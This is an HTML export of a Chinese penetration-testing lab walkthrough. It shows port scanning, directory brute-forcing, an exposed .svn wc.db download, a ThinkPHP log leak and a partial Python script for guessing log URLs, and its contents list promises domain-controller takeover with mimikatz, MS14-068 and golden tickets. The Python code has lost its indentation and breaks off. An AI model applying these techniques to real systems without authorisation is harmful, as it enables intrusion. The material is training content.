        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21088"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.6. cs </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">里面集合了很多</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">net </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">命令</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21088 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">35</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21089"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.7.cobaltstrike mimikatz web </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">服务获取明密文</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21089 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">36</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21090"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.8. dir </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">访问域控</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc</span><span style="color:black;text-decoration:none;text-underline:none;"><span>....................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21090 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">37</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21091"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.9.cobaltstrike ms14-068 </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">提权到域控</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21091 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">37</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21092"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.10. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">域控权限</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21092 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">39</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21093"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.11. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">明文哈希</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21093 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">41</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21094"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.2.12.cobaltstrike </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">制作黄金<span lang="EN-US">票据</span></span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21094 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">41</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21095"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6. FLAG </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21095 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">43</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21096"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">web flag1</span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21096 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">43</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21097"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.2. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">web flag2</span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21097 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">44</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21098"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.3. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">dc flag3</span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21098 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">44</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21099"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">7. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">关注</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21099 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">44</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:8.0pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <!--><span lang="EN-US"><span style="mso-element:field-end;"></span></span><!--><span lang="EN-US">&nbsp;</span>
</p>
</w:sdt>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
        <a name="_Toc21038"></a><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">1. </span>环境介绍<span lang="EN-US"></span>
</h1>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:4.1pt;margin-left:-.25pt;">
        <a name="_Toc21039"></a><span lang="EN-US">1.1.</span><span><span style="font-family:黑体;font-weight:normal;">内网渗透环境</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:26.1pt;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <img width="554" height="253" src="https://www.2k8.org/content/uploadfile/202203/17/c227cdbf.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:49.35pt;margin-left:-.25pt;margin-right:91.4pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">这个靶场是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">webhack123 WEB </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">服务器有两块网卡 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">是域控本文为技术培训技术文档，过程可能会让新人有点难以理解。过程是从 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">kali </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">渗透到 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">web </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">再渗透到内网 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">dc </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">也就是从外网打到域控</span><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
        <a name="_Toc21040"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">2.</span></b>信息收集<span lang="EN-US"></span>
</h1>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21041"></a><span lang="EN-US">2.1.masscan </span><span><span style="font-family:黑体;font-weight:normal;">端口探测</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:22.95pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">masscan -p 1-65535 192.168.0.150 --rate=1000</span><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:14.75pt;margin-left:-.25pt;">
        <a name="_Toc21042"></a><span lang="EN-US">2.2.nmap </span><span><span style="font-family:黑体;font-weight:normal;">获取系统和端口版本信息</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">nmap -p 3306,49154,80,47001,49157,139,49153,445,135,49155,49156,49152 -A</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">192.168.0.150 -oA webhack</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:10.6pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="293" src="https://www.2k8.org/content/uploadfile/202203/17/fc4b417f.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:48.15pt;margin-left:-.25pt;margin-right:87.2pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">从端口探测的信息得到服务器是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">WEB </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">容器是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">phpstudy </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">套件操作系统是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">Microsoft Windows Server 2008 R2</span><span lang="EN-US"></span>
</p>
<h1 style="margin-top:0cm;margin-right:0cm;margin-bottom:19.35pt;margin-left:-.25pt;">
        <a name="_Toc21043"></a><b><span lang="EN-US" style="font-family:Segoe UI,sans-serif;">3.</span></b>对网站进行安全检测<span lang="EN-US"></span>
</h1>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21044"></a><span lang="EN-US">3.1.</span><span><span style="font-family:黑体;font-weight:normal;">绑定 </span><span lang="EN-US">hosts</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:1.2pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">192.168.0.150 </span><span lang="EN-US"><a href="http://www.webhack123.com/"><span style="color:blue;font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">www.webhack123.com</span></a></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">发 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">www.webhack123.com </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">是一个 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">xxx </span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">平台 核心框架是 </span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">ThinkPHP_3.1.3</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">后台暂时还不知道</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;">
        <img width="553" height="285" src="https://www.2k8.org/content/uploadfile/202203/17/97e8d710.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21045"></a><span lang="EN-US">3.2.gobuster </span><span><span style="font-family:黑体;font-weight:normal;">目录文件扫描</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">gobuster dir -u http://www.webhack123.com -w /usr/share/wordlists/dirb/big.txt</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:21.75pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="311" src="https://www.2k8.org/content/uploadfile/202203/17/78b00c8a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.15pt;margin-left:-.25pt;">
        <a name="_Toc21046"></a><span lang="EN-US">3.3.svn </span><span><span style="font-family:黑体;font-weight:normal;">遍历源代码漏洞</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">.svn</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">存在可以遍历文件 但是这里失败</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:0cm;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="327" src="https://www.2k8.org/content/uploadfile/202203/17/693bb28a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.0pt;margin-left:-.25pt;">
        <a name="_Toc21047"></a><span lang="EN-US">3.4.wc.db </span><span><span style="font-family:黑体;font-weight:normal;">文件下载</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.55pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">这个<span lang="EN-US">sqlite</span>数据库文件 里面存在网站目录文件信息</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:1.55pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">svn</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">如果没有获取 可以下载当前下的<span lang="EN-US">wc.db</span>用<span lang="EN-US"> sqlitebrowser wc.db</span>打开</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">下载<span lang="EN-US"> http://www.webhack123.com/.svn/wc.db</span></span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:13.8pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="554" height="108" src="https://www.2k8.org/content/uploadfile/202203/17/91f1797a.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:9.8pt;margin-left:1.55pt;margin-right:-.15pt;margin-top:0cm;">
        <img width="553" height="355" src="https://www.2k8.org/content/uploadfile/202203/17/9d70fa11.jpg" alt="" style="vertical-align:middle;" /><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:40.85pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">查看数据库 基本知道网站的整个架构</span><span lang="EN-US"></span>
</p>
<h2 style="margin-top:0cm;margin-right:0cm;margin-bottom:13.0pt;margin-left:-.25pt;">
        <a name="_Toc21048"></a><span lang="EN-US">3.5.thinkphp </span><span><span style="font-family:黑体;font-weight:normal;">日志文件泄露</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.25pt;margin-left:-.25pt;margin-right:70.5pt;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:112%;">在<span lang="EN-US">ThinkPHP_3.1.3</span>中 日志文件始开启的经过<span lang="EN-US">wc.db</span>可以知道文件目录位置</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:39.75pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:宋体;font-size:10.5pt;line-height:112%;">http://www.webhack123.com/App/Runtime/Logs/19_06_29.log</span><span lang="EN-US"></span>
</p>
<h2 style="margin-left:-.25pt;">
        <a name="_Toc21049"></a><span lang="EN-US">3.6.python </span><span><span style="font-family:黑体;font-weight:normal;">编写日志文件</span></span><span lang="EN-US"></span>
</h2>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">#coding</span><span style="font-family:宋体;font-size:10.5pt;line-height:112%;">：</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">utf-8</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">import requests</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:16.6pt;margin-left:-.25pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">url ="http://www.webhack123.com/App/Runtime/Logs"</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:20.25pt;margin-right:314.4pt;margin-top:0cm;text-indent:-21.0pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">def add_urls(patch,y): urls=[] for i in range(1,7):</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:63.0pt;margin-right:281.85pt;margin-top:0cm;text-indent:-21.0pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">for j in range(1,32): if i&lt;10:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:.8pt;margin-left:63.0pt;margin-right:95.0pt;margin-top:0cm;text-indent:21.0pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">if j&lt;10: urls.append(patch+"/%s_0%s_0%s.log" % (y,i,j)) else: urls.append(patch+"/%s_0%s_%s.log" % (y,i,j)) else:</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:31.95pt;margin-left:84.5pt;margin-right:100.65pt;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">if j&lt;10: urls.append(patch+"/%s_%s_0%s.log" % (y,i,j)) else: urls.append(patch+"/%s_%s_%s.log" % (y,i,j))</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:112%;margin-bottom:47.8pt;margin-left:21.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:112%;">return urls</span><span lang="EN-US"></span>
</p>
